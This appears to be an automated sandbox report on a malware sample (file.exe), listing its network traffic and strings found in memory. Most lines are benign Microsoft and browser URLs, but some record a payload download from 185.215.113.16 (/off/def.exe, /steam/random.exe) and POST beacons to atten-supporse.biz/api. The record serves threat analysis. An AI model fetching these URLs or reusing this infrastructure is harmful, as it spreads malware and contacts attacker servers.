                Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=79HRUOOHgFAO4nP&MD=mY8Kwcd6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
                Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
                Source: file.exe, 00000000.00000003.2444947495.0000000000E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                Source: file.exe, 00000000.00000003.2444947495.0000000000E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: chromecache_109.7.drString found in binary or memory: http://schema.org/Organization
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://aka.ms/certhelp
                Source: chromecache_109.7.dr, chromecache_110.7.drString found in binary or memory: https://aka.ms/feedback/report?space=61
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://aka.ms/msignite_docs_banner
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://aka.ms/pshelpmechoose
                Source: chromecache_109.7.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
                Source: file.exe, 00000000.00000003.2271845650.00000000057AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316413587.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316661274.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2298786297.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2274037239.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2274414682.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2302547131.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2444775984.00000000057AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221046223.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299010294.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2271990079.00000000057AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                Source: file.exe, 00000000.00000003.2444873653.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2271822071.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2274120988.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221046223.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299010294.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
                Source: file.exe, 00000000.00000003.2298854041.0000000000E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api.
                Source: file.exe, 00000000.00000003.2244834702.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2271822071.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221046223.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apik
                Source: chromecache_109.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
                Source: chromecache_109.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
                Source: file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://channel9.msdn.com/
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
                Source: file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/Thraka
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/Youssef1313
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/adegeo
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://github.com/dotnet/try
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/gewarren
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/mairaw
                Source: chromecache_109.7.drString found in binary or memory: https://github.com/nschonni
                Source: file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chromecache_109.7.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
                Source: chromecache_101.7.drString found in binary or memory: https://schema.org
                Source: file.exe, 00000000.00000003.2246719404.00000000058C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: file.exe, 00000000.00000003.2246719404.00000000058C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
                Source: chromecache_101.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
                Source: file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chromecache_88.7.dr, chromecache_101.7.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
                Source: file.exe, 00000000.00000003.2246650108.00000000057CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: file.exe, 00000000.00000003.2246650108.00000000057CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: file.exe, 00000000.00000003.2246719404.00000000058C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: file.exe, 00000000.00000003.2246719404.00000000058C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: file.exe, 00000000.00000003.2246719404.00000000058C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
